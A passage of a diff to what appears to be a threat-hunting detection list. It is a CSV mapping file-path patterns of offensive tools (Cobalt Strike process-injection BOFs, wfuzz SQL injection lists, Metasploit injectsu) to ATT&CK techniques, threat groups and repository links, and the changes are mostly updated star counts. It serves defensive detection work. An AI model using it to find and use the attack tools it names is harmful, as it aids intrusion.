- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By 